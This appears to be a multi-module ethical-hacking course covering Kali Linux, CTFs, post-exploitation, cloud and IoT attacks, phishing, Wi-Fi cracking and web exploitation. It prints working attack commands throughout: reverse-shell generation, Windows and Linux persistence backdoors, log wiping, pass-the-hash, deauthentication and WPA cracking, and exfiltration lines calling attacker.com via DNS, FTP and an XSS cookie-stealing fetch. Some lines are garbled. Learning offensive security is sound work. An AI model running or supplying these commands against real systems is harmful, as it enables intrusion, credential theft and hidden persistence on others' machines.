Kali Linux: The Complete Tutorial

1. Introduction to Kali Linux

Kali Linux is the part of cybersecurity course and world's most advanced penetration testing distribution, maintained by Offensive Security. It comes pre-installed with 600+ cybersecurity tools for:

- Ethical hacking & penetration testing

- Digital forensics

- Security research

- Vulnerability assessment

Key Features

✅ Free & open-source  

✅ Custom kernel patched for injection  

✅ Supports ARM devices (Raspberry Pi, Android)  

✅ Rolling release updates  

2. Kali Linux Installation

A. Installation Options

1. Bare Metal Install (Directly on hardware)

2. Virtual Machine (VMware/VirtualBox)

3. Live USB (Persistent storage possible)

4. WSL (Windows Subsystem for Linux)

5. Cloud (AWS, Azure, Google Cloud)

B. Recommended System Requirements

- RAM : 4GB+ (8GB preferred)

- Storage : 20GB+ free space

- CPU : 64-bit processor (Intel/AMD)

C. Installation Steps

1. Download ISO from [kali.org](https://www.kali.org/get-kali/)

2. Create bootable USB (Use Rufus or dd):

   bash

      dd if=kali-linux.iso of=/dev/sdb bs=4M status=progress      

   3. Boot from USB and follow installer

3. Kali Linux Setup & Configuration

A. First Boot Tasks

1. Update system :

   bash

   sudo apt update && sudo apt full-upgrade -y

2. Install guest additions (If using VM):

   bash

   sudo apt install -y open-vm-tools-desktop     

   

B. Essential Configurations

1. Enable SSH :

   bash

   sudo systemctl enable ssh --now      

 

2. Change default password (`kali:kali`):

   bash

   passwd     

   3. Add a new user :

   bash

   sudo useradd -m -G sudo newuser   

   sudo passwd newuser                                                  

   

C. Customizing Kali

1. Install favorite tools :

   bash

   sudo apt install -y terminator flameshot neofetch    

   2. Change desktop environment :

   bash

   sudo apt install -y kali-desktop-xfce  # Switch to XFCE      

   

4. Kali Linux Tools Overview

Kali organizes tools into 14 categories :

A. Information Gathering

- Nmap (Network scanning)

- Recon-ng (Web reconnaissance)

- theHarvester (Email/domain OSINT)

B. Vulnerability Analysis

- Nessus (Vulnerability scanner)

- OpenVAS (Open-source alternative)

- Nikto (Web server scanner)

C. Wireless Attacks

- Aircrack-ng (Wi-Fi cracking)

- Wifite (Automated Wi-Fi attacks)

- Kismet (Wireless detection)

D. Web Application Analysis

- Burp Suite (Web proxy)

- OWASP ZAP (Web app scanner)

- SQLmap (SQL injection)

E. Password Attacks

- Hydra (Network login cracker)

- John the Ripper (Password cracking)

- Hashcat (GPU-accelerated cracking)

F. Exploitation Tools

- Metasploit Framework (Exploit development)

- ExploitDB (Archive of exploits)

- BeEF (Browser exploitation)

G. Post-Exploitation

- Mimikatz (Windows credential dumping)

- PowerSploit (Post-exploit PowerShell)

- Cobalt Strike (Advanced red teaming)

H. Forensics Tools

- Autopsy (Digital forensics)

- Volatility (Memory forensics)

- Binwalk (Firmware analysis)

I. Social Engineering

- SET (Social Engineer Toolkit)

- Gophish (Phishing framework)

- Evilginx2 (Advanced phishing)

5. Kali Linux Terminal Basics

Essential Commands

| Command | Description |

|---------      |-------------|

|        sudo | Execute as root |

| apt update | Update package list |

|  apt install <pkg> | Install software |

| ip a | Show network interfaces |

|  cd | Change directory |

|  ls | List files |

| chmod | Change permissions |

|    grep | Search text |

|    find | Locate files |

Managing Services

bash

sudo systemctl start ssh   # Start SSH      

sudo systemctl stop ssh    # Stop SSH     

sudo systemctl status ssh  # Check status

6. Practical Kali Linux Labs

Lab 1: Network Scanning with Nmap

bash

sudo nmap -sV -A 192.168.1.1  # Basic scan     

sudo nmap -p- -T4 192.168.1.1  # Full port scan  

Lab 2: Cracking Wi-Fi with Aircrack-ng

bash

sudo airmon-ng start wlan0                 

sudo airodump-ng wlan0mon             

sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon       

sudo aircrack-ng -w rockyou.txt capture.cap                  

Lab 3: Web App Testing with Burp Suite

1. Configure browser proxy (`127.0.0.1:8080`)

2. Intercept requests and modify parameters

Lab 4: Creating a Reverse Shell

bash

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > shell.elf    

nc -lvnp 4444  # On attacker machine            

7. Kali Linux Tips & Tricks

A. Performance Optimization

- Disable unnecessary services :

  bash

  sudo systemctl disable bluetooth       

- Use ZRAM for better RAM management :

  bash

  sudo apt install -y zram-config         

 

B. Troubleshooting

1. Wi-Fi not working?

   bash

   sudo apt install -y firmware-realtek     

   

2. Graphics issues?

   bash

       sudo apt install -y kali-desktop-xfce        

C. Maintaining Kali

- Regular updates:

  bash

  sudo apt update && sudo apt full-upgrade -y     

- Clean old packages:

  bash

         sudo apt autoremove          

8. Kali Linux for Different Use Cases

A. Penetration Testing

- Use Metasploit, Burp Suite, Nmap

- Follow OSCP-like methodology

B. Red Teaming

- Focus on C2 frameworks  (Cobalt Strike)

- Practice lateral movement

C. Digital Forensics

- Use  Autopsy, Volatility

- Learn file carving techniques 

D. Bug Bounty Hunting

- Master Burp Suite, SQLmap

- Focus on web vulnerabilities

9. Learning Resources

Free Courses

- [Kali Linux Revealed](https://kali.training/) (Official course)

- [TryHackMe Kali Linux](https://tryhackme.com/path/outline/kali) (Interactive)

Books

- "Penetration Testing with Kali Linux" (PWK/OSCP)

- "The Hacker Playbook" series

YouTube Channels

- The Cyber Mentor

- Null Byte

- Hackersploit

10. Ethical & Legal Considerations

⚠ Only test systems you own or have permission to test  

⚠ Do not use Kali for illegal activities  

⚠ Follow responsible disclosure  

Conclusion

Kali Linux is the ultimate toolkit for cybersecurity professionals. Mastering it requires:

1. Learning the tools

2. Practicing in labs 

3. Staying updated  

🔹 Next Steps :  

1. Set up your Kali lab environment  

2. Complete the Kali Linux Revealed course  

3. Start HTB/TryHackMe challenges  

🚀 Want a customized Kali Linux learning path? Let me know your goals!  

Capture The Flag (CTF) & Hands-On Labs

1. Introduction to CTFs

Capture The Flag (CTF) competitions are cybersecurity challenges where participants solve puzzles to find hidden "flags" (secret strings). CTFs help develop real-world hacking skills in a legal environment.

Types of CTFs

- Jeopardy-style (Categories: Web, Crypto, Binary, Forensics)

- Attack-Defense (Teams attack & defend servers)

- Mixed (Combination of both)

2. CTF Categories & Tools

A. Web Exploitation

Common Vulnerabilities :

- SQLi, XSS, CSRF, SSRF, JWT attacks

Tools  :

- Burp Suite, OWASP ZAP, SQLmap

Example Challenge : 

http://ctf.site/login.php?id=1'

Find the flag by exploiting SQL injection.

B. Reverse Engineering  Techniques :

- Static analysis (Ghidra, IDA Pro)

- Dynamic analysis (x64dbg, GDB)

Example Challenge:

c

// crackme.c

      if (input == 0xDEADBEEF) print_flag();     

C. Binary Exploitation

Common Attacks :

- Buffer overflows, ROP, Format strings

Tools  :

- Pwntools, GDB with Peda

Example Challenge :

python

from pwn import *      

p = process('./vuln')     

p.sendline(cyclic(100))

D. Cryptography

Common Challenges :

- RSA, AES, XOR, Frequency analysis

Tools :

- CyberChef, RsaCtfTool

Example Challenge :

  Ciphertext: U2FsdGVkX19zZWFzb24=

Password: "password"                             

E. Forensics

Common Tasks :

- Memory dump analysis (Volatility)

- Packet analysis (Wireshark)

- File carving (binwalk)

Example Challenge :

Analyze memory.dmp to find the hacker's IP.

F. Miscellaneous 

- OSINT, Steganography, Programming

3. CTF Strategies

A. General Approach

1. Recon (Examine all provided files)

2. Research (Google keywords, similar CTFs)

3. Exploit (Use appropriate tools)

4. Submit  (Flag format: `FLAG{...}`)

B. Time Management

- Start with easy challenges first

- Skip stuck problems after 30 mins

- Collaborate with teammates (if allowed)

4. Hands-On Labs Setup

A. Local Practice Environments

1. VulnHub (Download vulnerable VMs)

   - Example: Metasploitable, Kioptrix

2. HTB (Hack The Box) (Online machines)

   bash

   # Connect via OpenVPN

   openvpn lab_user.ovpn   

3. TryHackMe  (Guided learning paths)

B. Essential Tools Setup

bash

# Install CTF tools on Kali

     sudo apt install -y gdb peda pwntools steghide binwalk volatility    

5. Step-by-Step CTF Walkthrough

Challenge: Web Login Bypass

Given :

   http://ctf.site/login              

  Source: <!-- /source.php -->  

Steps :

1. View source → Find `/source.php`

2. Analyze code:

   php

   if ($_POST['password'] == md5('secret')) $flag = "FLAG{...}";      

3. Generate MD5 hash:

  bash

   echo -n 'secret' | md5sum      

4. Submit password hash → Get flag!

6. CTF Platforms

| Platform | Type | Difficulty |

|----------|------|------------|

| Hack The Box | Live machines | Medium-Hard |

| TryHackMe | Guided labs | Beginner |

| CTFtime | Competition hub | All levels |

| picoCTF | Jeopardy | Beginner |

| OverTheWire | War games | Progressive |

7. Advanced Techniques

A. Automating with Python

python

import requests                                         

for i in range(100):                                   

    r = requests.get(f'http://ctf.site?id={i}')

    if "FLAG{" in r.text:                             

        print(r.text)                                        

B. Binary Patch Exploits

bash

# Change JZ to JNZ in binary                                                              

printf '\x75' | dd of=./binary bs=1 seek=$((0x1234)) conv=notrunc    

   

C. Memory Corruption

python

# ROP chain example            

rop = ROP('./binary')             

rop.call('system', ['/bin/sh'])   

8. CTF Team Tips

- Roles : Reverser, Web expert, Crypto specialist

- Communication  : Discord + shared notes

-  Knowledge Sharing : Writeups after events

9. Post-CTF Learning

1. Read writeups for unsolved challenges

2. Recreate challenges for deeper understanding

3. Build your own CTFs (CTFd framework)

10. Free Practice Resources

1. picoCTF (Beginner-friendly)

2. OverTheWire Bandit (Linux skills)

3. Cryptopals (Crypto challenges)

4. MalwareTech Challenges (Beginner RE)

Conclusion

- CTFs are the best way to practice real-world hacking

- Start with easy challenges and progress gradually

- Learn from failures - every CTF improves skills

🔹 Next Steps :

***************Learn About Kali  Linux Tools**********************

***You can check out Here for Ethical Hacking  Programming Language ***

**********Practice  on Kali Linux Operating System*************

1. Create free account on HTB/TryHackMe

2. Join CTFtime.org for upcoming events

3. Solve picoCTF 2024 challenges

🚀 Want a curated list of beginner CTFs? Here's my recommended starting path:

1. OverTheWire Bandit (Linux)

2. picoCTF (General)

3. HTB Starting Point

4. NahamCon CTF

Would you like personalized challenge recommendations based on your skill level? 😊

Post-Exploitation & Reporting in cybersecurity career

1. Introduction to Post-Exploitation 

Post-exploitation refers to actions taken after gaining initial access to a system. The goals include:

- Maintaining persistence (staying undetected)

- Privilege escalation (gaining higher access)

- Lateral movement (expanding control)

- Data exfiltration (stealing sensitive info)

- Covering tracks  (removing evidence)

2. Post-Exploitation Techniques

A. Maintaining Access (Persistence)

1. Windows Persistence Methods

- Registry Keys (Run keys, Startup folders)

  powershell

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\malware.exe"     

  

-Scheduled Tasks

  powershell

    schtasks /create /tn "UpdateTask" /tr "C:\malware.exe" /sc hourly /mo 1   

  

- Service Installation

  powershell

    sc create "FakeService" binPath= "C:\malware.exe" start= auto      

2. Linux Persistence Methods

- Cron Jobs

  bash

  echo " /*****tmp/backdoor.sh" >> /etc/crontab     

  SSH Backdoors

  bash

     echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys     

-Modified Binaries (LD_PRELOAD)

  bash

  echo "/tmp/evil.so" >> /etc/ld.so.preload     

  

B. Privilege Escalation

1. Windows Escalation

-Token Impersonation (Rotten Potato)

  powershell

  Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"      

  

- DLL Hijacking

  powershell

      copy evil.dll C:\Program Files\VulnerableApp\legit.dll    

  

- Unquoted Service Paths

  powershell

  wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"    

  

2. Linux Escalation

- SUID Binaries

  bash

  find / -perm -4000 2>/dev/null      

  

- Kernel Exploits (DirtyCow, Sudo Baron Samedit)

  bash

     gcc exploit.c -o exploit && ./exploit     

  

- Sudo Misconfigurations

  bash

     sudo -l      

C. Lateral Movement

1. Pass-the-Hash (PtH)

- Windows

  powershell

      mimikatz "sekurlsa::pth /user:Administrator /domain:corp /ntlm:HASH"    

  

- Linux (SSH Key Abuse)

  bash

     ssh -i id_rsa user@192.168.1.100     

  

2. RDP Hijacking

- Session Stealing

  powershell

       tscon 2 /dest:rdp-tcp#0      

  

3. WMI & PSExec

- Remote Command Execution

  powershell

      Invoke-WMIExec -Target 192.168.1.100 -Command "whoami"        

  

D. Data Exfiltration

1. File Transfer Methods

- HTTP Upload (Python Server)

  bash

      python3 -m http.server 8000        

  

- DNS Exfiltration

  bash

  cat secret.txt | base64 | tr -d '\n' | while read chunk; do dig $chunk.attacker.com; done       

  

2. Data Compression & Encryption

- ZIP + AES Encryption

  bash

    zip -P "password" secret.zip secret.txt      

  

E. Covering Tracks

1. Log Deletion

- Windows (Clear Event Logs)

  powershell

  wevtutil cl System    

- Linux (Delete Auth Logs)

  bash

      echo "" > /var/log/auth.log       

  

2. Timestomping

- Modify File Timestamps

  powershell

  (Get-Item "C:\malware.exe").CreationTime = "01/01/2020 00:00:00"      

3. Post-Exploitation Tools

| Tool     |    Purpose |

|   ------  |      ---------|

| Mimikatz | Credential dumping (Windows) |

| BloodHound | Active Directory mapping |

| Cobalt Strike | Advanced post-exploitation |

| Metasploit | Automated exploitation |

| Impacket | Lateral movement (Linux/Windows) |

4. Reporting & Documentation

A. Key Elements of a Penetration Test Report

1. Executive Summary (High-level findings)

2. Methodology (Tools & techniques used)

3. Findings (Vulnerabilities + risk ratings)

4. Evidence (Screenshots, logs)

5. Remediation Steps (How to fix issues)

B. Sample Report Structure

Penetration Test Report  

1. Executive Summary  

- Critical vulnerabilities found: 3  

- Risk level: High  

2. Findings  

A. Privilege Escalation (Critical)  

Description: Kernel exploit (CVE-2021-4034)  

Proof:  

  

Remediation: Patch Linux kernel.  

3. Conclusion  

- Immediate action required for CVE-2021-4034.  

C. Tools for Reporting

- Dradis (Collaborative reporting)

- Faraday (Pentest collaboration)

- LaTeX/Word (Professional formatting)

5. Hands-On Lab

Lab: Windows Post-Exploitation

1. Dump hashes with Mimikatz  :

   powershell

  sekurlsa::logonpasswords

2. Create a backdoor:

   powershell

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > backdoor.exe

   

3. Exfiltrate data via FTP:

   powershell

  (New-Object Net.WebClient).UploadFile("ftp://attacker.com/secrets.txt", "C:\secrets.txt")

   

6. Ethical & Legal Considerations

⚠ Always get written permission before testing.  

⚠ Do not exfiltrate real customer data (use dummy files).  

⚠ Follow responsible disclosure for vulnerabilities.  

Conclusion

- Post-exploitation is about maintaining access, escalating privileges, and stealing data.  

- Reporting is critical for fixing vulnerabilities.  

- Use tools like Mimikatz, BloodHound, and Metasploit for efficiency.  

Post-Exploitation & Reporting is the part of  cybersecurity Training 

🔹 Next Steps :  

Module 12: Capture The Flag (CTF) & Hands-On Labs  

- Try HTB (Hack The Box) machines for practice.  

- Learn Active Directory exploitation.  

- Explore C2 frameworks (Sliver, Covenant).  

🚀 Want a sample penetration test report template? Let me know!  

Cloud Security & IoT Hacking

Part 1: Cloud Security

1. Introduction to Cloud Security

Cloud security is the part of cybersecurity career. Cloud security focuses on protecting data, applications, and infrastructure in cloud environments (AWS, Azure, GCP). Major risks include:

- Misconfigurations (Exposed S3 buckets)

- Insecure APIs

- Account hijacking

- Insider threats

2. Cloud Attack Vectors

A. Storage Bucket Exploitation

- AWS S3 Bucket Enumeration :

  bash

     aws s3 ls s3://bucket-name --no-sign-request    

 Tools : S3Scanner  ,  BucketStream

B. Privilege Escalation

- AWS IAM Misconfigurations :

  bash

    aws iam list-users    

    aws iam list-roles    

  

Tools : Pacu , CloudBrute

C. Serverless (Lambda) Attacks

- Injection in Lambda functions

Tools : Lambda-Proxy , AWS CLI

D. Container & Kubernetes Hacking

- Escaping Docker containers :

  bash

  docker run --privileged -it alpine    

  Tools :  kube-hunter ,  Peirates

3. Cloud Security Tools

| Tool      |     Purpose |

|-----      -|      ---------|

|   ScoutSuite   | Multi-cloud auditing |

|    CloudSploit | AWS/GCP/Azure security checks |

|      Terrascan | IaC (Terraform) security scanner |

|     Kubescape | Kubernetes security |

Part 2: IoT Hacking

1. IoT Attack Surface

- Firmware vulnerabilities

- Insecure APIs (MQTT, CoAP)

- Default credentials ( admin:admin )

- Hardware attacks (UART, JTAG)

2. IoT Hacking Methodology

A. Reconnaissance

-Shodan/FoFa Search :

      shodan search "default password"      

- Firmware Extraction :

  bash

      binwalk -e firmware.bin       

B. Exploitation

- Brute-forcing Telnet/SSH :

  bash

      hydra -l admin -P rockyou.txt 192.168.1.1 telnet        

 -MQTT Exploitation :

  bash

  mosquitto_sub -t "#" -h 192.168.1.100     

C. Hardware Hacking

- UART Pin Extraction :

  - Identify TX/RX/GND pins

  - Connect via USB-to-TTL adapter

- JTAG Debugging :

  - Use  OpenOCD ,  UrJTAG

3. IoT Security Tools

|    Tool   |     Purpose |

|------      |       ---------|

|   Firmware Analysis Toolkit (FAT) | Automated firmware analysis |

| RouterSploit   | IoT exploitation framework |

|   Wireshark     | Network protocol analysis |

|  JTAGulator    | Hardware debugging |

Part 3: Defense Strategies

Cloud Security Best Practices

✔ Enable MFA for all cloud accounts  

✔ Use IAM roles instead of root keys  

✔ Encrypt S3 buckets & EBS volumes  

✔ Monitor with AWS GuardDuty/Azure Sentinel  

IoT Security Best Practices

✔ Change default credentials  

✔ Disable unused services (Telnet)  

✔ Implement firmware signing  

✔ Use VLANs to segment IoT devices  

Hands-On Labs

Lab 1: Hacking an AWS S3 Bucket

1. Find open buckets:

   bash

      aws s3 ls s3:// --no-sign-request      

2. Download files:

   bash

   aws s3 cp s3://bucket-name/file.txt      

Lab 2: Exploiting IoT Camera

1. Find target:

   bash

   shodan search "webcam"

   2. Login with admin:admin

3. Access live feed via /video.mjpg

Conclusion

- Cloud security requires configuration auditing  

- IoT hacking combines network + hardware attacks  

- Defense = encryption + segmentation + monitoring

🔹 Next Steps :  

Module 11: Post-Exploitation & Reporting

- Try  AWS CTF challenges (CloudGoat)  

- Explore IoT villages at DEFCON  

- Learn hardware reverse engineering

🚀 Want a step-by-step walkthrough for hacking a smart bulb? Let me know! 

Social Engineering & Phishing

Introduction to Social Engineering

Social engineering is the part of cybersecurity course and  art of manipulating people into divulging confidential information or performing actions that compromise security. It exploits human psychology rather than technical vulnerabilities.

Why It Works

- 98% of cyberattacks involve social engineering (IBM)

- Humans are the weakest link in security

- Low-cost, high-reward for attackers

Types of Social Engineering Attacks in cybersecurity 

1. Phishing (Most Common)

- Deceptive emails/messages pretending to be legitimate

- Goals: Steal credentials, spread malware, financial fraud

Types:

  - Email phishing (Fake invoices, "urgent" requests)

  - Spear phishing (Targeted at individuals)

  - Whaling (Targets executives)

  - Smishing (SMS phishing)

  - Vishing (Voice call phishing)

2. Pretexting

- Creating a fabricated scenario to obtain information

- Example: "IT support" calling to "verify your password"

3. Baiting

- Offering something enticing (free software, USB drops)

- Often contains malware

4. Quid Pro Quo

- "Exchange" of services (e.g., "free tech support" for login details)

5. Tailgating/Piggybacking

- Physically following someone into restricted areas

Phishing: Step-by-Step Attack Breakdown in cybersecurity course

Phase 1: Reconnaissance

- Research targets (LinkedIn, company website)

- Gather emails (Hunter.io, phonebook)

- Study communication style

Phase 2: Crafting the Attack

A. Email Phishing Example

html

From: "Amazon Support" <support@amazon-security.com>

Subject: Urgent: Unusual Login Attempt

Dear Customer,

We detected a login from Nigeria (IP: 196.xxx.xxx). 

Click here to verify your account: http://amazon-verify.com/login

- Amazon Security Team        

Red Flags:

- Fake domain (`amazon-verify.com`)

- Urgency + fear tactics

- Suspicious link

B. Clone Phishing

1. Hack a real email thread

2. Replace attachments/links with malicious ones

Phase 3: Delivery

- Send via email, SMS, or social media

- Use URL shorteners (bit.ly) to hide malicious links

- Spoof sender addresses (Easy with SMTP)

Phase 4: Exploitation

- Fake login pages (Steal credentials)

- Malware downloads (RATs, keyloggers)

- Financial scams (Gift cards, wire transfers)

Phase 5: Post-Attack

- Cover tracks (Delete logs)

- Sell data on dark web

- Use credentials for further attacks

Tools Used in Phishing

| Tool | Purpose |

|------|---------|

|    Gophish    | Open-source phishing framework |

|  SET (Social Engineer Toolkit)  | Automated phishing attacks |

|   King Phisher  | Realistic phishing campaigns |

|   Evilginx2        | Advanced phishing (MFA bypass) |

|  GoPhish           | Email template cloning |

How to Defend Against Social Engineering For Individuals:

✔ Verify sender emails (Check domain spelling)  

✔ Hover over links before clicking  

✔ Enable MFA (Blocks 99% of phishing)  

✔ Don’t trust urgency/fear messages  

✔ Report suspicious emails to IT  

For Organizations:

✔ Employee training (Phishing simulations)  

✔ Email filtering (Mimecast, Proofpoint)  

✔ DMARC/DKIM/SPF (Prevent email spoofing)  

✔ Web filtering (Block malicious sites)  

✔ Incident response plan  

Ethical Phishing Testing in cybersecurity course

Steps for Legal Phishing Tests:

1. Get written permission  

2. Use simulated domains (e.g., `company-security-test.com`)  

3. Provide training after tests  

4. Never steal real data  

Tools for Security Awareness:

- KnowBe4 (Phishing simulations)  

- PhishMe (Now Cofense)  

- Microsoft Attack Simulator  

Real-World Case Studies

1. 2016 DNC Hack (Russian spear phishing)  

2. Twitter Bitcoin Scam  (Celebrity accounts hacked via vishing)  

3. Colonial Pipeline Attack (Compromised VPN via leaked password)  

Conclusion

- Social engineering exploits human trust  and best part of cybersecurity course

- Phishing is the #1 attack vector (FBI IC3 Report)  

- Defense requires awareness + technology  

🔹 Next Steps:

Module 10: Cloud Security & IoT Hacking   

- Try ethical phishing labs (TryHackMe)  

- Learn OSINT techniques for reconnaissance  

- Explore dark web monitoring tools  

🚀 Want a hands-on phishing lab walkthrough? Let me know!  

Wireless Network Hacking

Introduction to Wireless Security

Wireless networks (Wi-Fi) are vulnerable to various attacks due to weak encryption, misconfigurations, and physical accessibility. This guide covers **reconnaissance, exploitation, and defense** techniques for both **WEP, WPA/WPA2, and WPA3** networks.

1. Wireless Reconnaissance

A. Identifying Networks

- Scan for nearby networks:

  bash

  sudo iwconfig          # List available interfaces

  sudo airmon-ng start wlan0  # Enable monitor mode

  sudo airodump-ng wlan0mon   # Scan networks      

  

Key details :

  -BSSID (MAC address of AP)

  - ESSID (Network name)

  - Channel, Encryption (WEP/WPA/WPA2)

B. Target Selection

- Prioritize weak networks :

  - WEP (Easily crackable)

  - WPA/WPA2-PSK (Vulnerable to brute force)

  - Open Wi-Fi (No encryption)

2. Wireless Attacks

A. WEP Cracking (Outdated but Still Found)

WEP uses RC4 encryption and is easily crackable due to IV (Initialization Vector) reuse.

Steps:

1. Capture packets:

   bash

     sudo airodump-ng -c <channel> --bssid <BSSID> -w wep_crack wlan0mon    

2. Force IV generation (ARP replay attack):

   bash

   sudo aireplay-ng -3 -b <BSSID> -h <client_MAC> wlan0mon     

   

3. Crack with aircrack-ng:

   bash

   sudo aircrack-ng wep_crack-01.cap

B. WPA/WPA2 Cracking

WPA/WPA2-PSK (Pre-Shared Key) is vulnerable to brute force/dictionary attacks.

Steps:

1. Capture WPA Handshake (4-way authentication):

   bash

   sudo airodump-ng -c <channel> --bssid <BSSID> -w handshake wlan0mon

   

2. Deauthenticate a client to force reconnection:

   bash

   sudo aireplay-ng -0 5 -a <BSSID> -c <client_MAC> wlan0mon    

 

3. Crack with  hashcat or aircrack-ng :

  bash

   aircrack-ng -w rockyou.txt handshake-01.cap   

   or

  bash

   hashcat -m 22000 handshake.hc22000 rockyou.txt     

  

C. Evil Twin Attack (Rogue AP)

- Creates a fake Wi-Fi network to steal credentials.

Tools :  airbase-ng ,  hostapd-wpe .

Steps:

1. Set up rogue AP:

   bash

      sudo airbase-ng -a <BSSID> --essid "Free_WiFi" -c <channel> wlan0mon       

2. Redirect traffic:    

   bash

   sudo dnschef -i <interface> --fakeip 192.168.1.1     

   

3. Capture credentials when victims connect.

D. WPS (Wi-Fi Protected Setup) Attack

- WPS PIN brute force (if enabled).

Tools :  reaver , bully.

Steps:

bash

     sudo reaver -i wlan0mon -b <BSSID> -vv -K 1      

E. KRACK Attack (Key Reinstallation Attack)

- Exploits WPA2's 4-way handshake vulnerability.

Tool : krackattacks-scripts .

Steps:

1. Monitor network traffic.

2. Forge handshake packets to intercept data.

3. Advanced Attacks

A. PMKID Attack (WPA/WPA2)

- Extracts PMKID (Pairwise Master Key ID) without handshake.

Tool : hcxdumptool ,  hashcat .

Steps:

1. Capture PMKID:

   bash

   sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1    

   

2. Crack with hashcat :

   bash

      hashcat -m 16800 pmkid.hc16800 rockyou.txt      

  

B. WPA3 Downgrade Attack

- Forces WPA3 → WPA2 fallback.

Tool  :  dragonblood .

4. Defensive Measures

A. Securing Wi-Fi Networks

✔ Use WPA3-SAE (if available) 

✔ Disable WPS (Vulnerable to brute force)  

✔ Use strong passwords (Avoid dictionary words)  

✔ Enable MAC filtering (Whitelist devices)  

✔ Disable SSID broadcasting (Hidden network)  

✔ Monitor for rogue APs (Airodump-ng, Kismet)  

B. Detection Tools

- Wireshark (Analyze Wi-Fi traffic)  

- Kismet (Wireless IDS)  

- Aircrack-ng (Test security)  

5. Hands-On Lab

Lab: Cracking WPA2 with Aircrack-ng

1. Enable monitor mode :

   bash

       sudo airmon-ng start wlan0       

   

2. Scan networks:

   bash

      sudo airodump-ng wlan0mon       

3. Capture handshake :

   bash

   sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon       

4. Deauth a client :

   bash

   sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon       

  

5. Crack the handshake :

   bash

   sudo aircrack-ng -w rockyou.txt capture-01.cap     

6. Legal & Ethical Considerations

⚠ Only hack networks you own or have permission to test.  

⚠ Unauthorized access is illegal (Computer Fraud and Abuse Act, etc.).  

Conclusion

- WEP is trivial to crack (RC4 weakness).  

- WPA/WPA2 is vulnerable to brute force (Weak passwords).  

- WPA3 improves security but has downgrade risks.  

- Evil Twin & WPS attacks are still effective.  

🔹 Next Steps:  

Module 9: Social Engineering & Phishing  

- Try Wi-Fi challenges on Hack The Box / TryHackMe.  

- Learn RF hacking (Bluetooth, Zigbee).  

- Explore enterprise Wi-Fi security (RADIUS, 802.1X).  

Would you like a step-by-step Evil Twin attack demo? 🚀

Web Application Hacking

Introduction to Web App Security

Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.

1. Web App Reconnaissance

Information Gathering

- WHOIS Lookup (Domain details)

- Subdomain Enumeration (Sublist3r, Amass)

- Technology Stack Detection (Wappalyzer, BuiltWith)

- Directory Bruteforcing (Dirb, Gobuster)

- Wayback Machine (Historical snapshots)

Tools

bash

sublist3r -d example.com  

wappalyzer.com  

gobuster dir -u https://example.com -w /path/to/wordlist.txt

2. Common Web Vulnerabilities

A. Injection Attacks

1. SQL Injection (SQLi)

- Classic SQLi: ' OR 1=1 -- -

- Blind SQLi: Time-based/Boolean-based

Tools: SQLmap, Burp Suite

Example:

sql

  SELECT * FROM users WHERE username = 'admin'--' AND password = ''  

2. Command Injection

- Executing OS commands via input fields:

  bash

  ; cat /etc/passwd  

3. Cross-Site Scripting (XSS)

- Stored XSS : <script>alert(1)</script>

-  Reflected XSS : https://example.com/search?q=<script>alert(1)</script>

- DOM XSS: Browser-side script execution

B. Broken Authentication

1. Credential Stuffing

- Using breached passwords

Tools : Hydra, Burp Intruder

2. Session Hijacking

- Stealing cookies via XSS/MITM

Tools : Ferret, Hamster

3. Default Credentials

- admin:admin ,  root:password

C. Sensitive Data Exposure

1. Insecure APIs

- Exposed API keys, tokens

Tools : Postman, Burp Suite

2. Directory Listing

-  /backup, /admin accessible

D. Security Misconfigurations

1. Exposed Admin Panels

-  /admin , /wp-admin

2. Verbose Error Messages

- Leaking stack traces, DB info

E. Cross-Site Request Forgery (CSRF)

- Forcing users to execute unwanted actions:

  html

  <img src="https://bank.com/transfer?amount=1000&to=attacker">   

F. Server-Side Request Forgery (SSRF)

- Accessing internal services:

    https://example.com/fetch?url=http://localhost   

 

G. XML External Entity (XXE)

- Reading local files via XML:

  xml

  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>  

  

3. Exploitation Techniques

Step 1: Automated Scanning

- Burp Suite (Manual testing)

- OWASP ZAP (Automated scanning)

- Nikto (Vulnerability scanner)

Step 2: Manual Testing

- Intercepting requests (Burp Proxy)

- Tampering parameters (Headers, cookies)

- Fuzzing inputs (Wfuzz, FFUF)

Step 3: Post-Exploitation

- Privilege escalation

- Data exfiltration

- Persistence mechanisms

4. Hands-On Labs

Lab 1: SQL Injection with SQLmap

1. Find vulnerable parameter:

   bash

   sqlmap -u "https://example.com/login?id=1" --dbs  

2. Dump database:

   bash

   sqlmap -u "https://example.com/login?id=1" -D dbname --tables    

   

Lab 2: XSS Exploitation

1. Inject payload in search box:

   html

   <script>alert(document.cookie)</script>  

2. Steal cookies:

   javascript

   fetch('https://attacker.com/log?cookie=' + document.cookie)    

Lab 3: CSRF Attack

1. Craft malicious HTML:

   html

    <form action="https://bank.com/transfer" method="POST">

     <input type="hidden" name="amount" value="1000">

     <input type="hidden" name="to" value="attacker">

   </form>

   <script>document.forms[0].submit()</script>      

   

5. Defensive Measures

Secure Coding Practices

- Input validation

- Prepared statements (SQLi)

- CSP headers (XSS)

- CSRF tokens

Security Tools

- WAFs (ModSecurity, Cloudflare)

- DAST/SAST Scanners (Checkmarx, SonarQube)

- Honeypots (Glastopf)

6. Bug Bounty & Ethical Hacking

Platforms : HackerOne, Bugcrowd

Methodology:

  1. Recon

  2. Vulnerability Scanning

  3. Exploitation

  4. Reporting

Conclusion

- Web app hacking involves recon, exploitation, and post-exploitation.

- OWASP Top 10 is a must-know for pentesters.

- Automated tools + manual testing = Best approach.

🔹 Next Steps:

Module 8: Wireless Network Hacking

- Practice on DVWA, WebGoat.

- Try HTB, TryHackMe web challenges.

- Learn advanced Burp Suite techniques.

Would you like a deep dive into bypassing WAFs? 🚀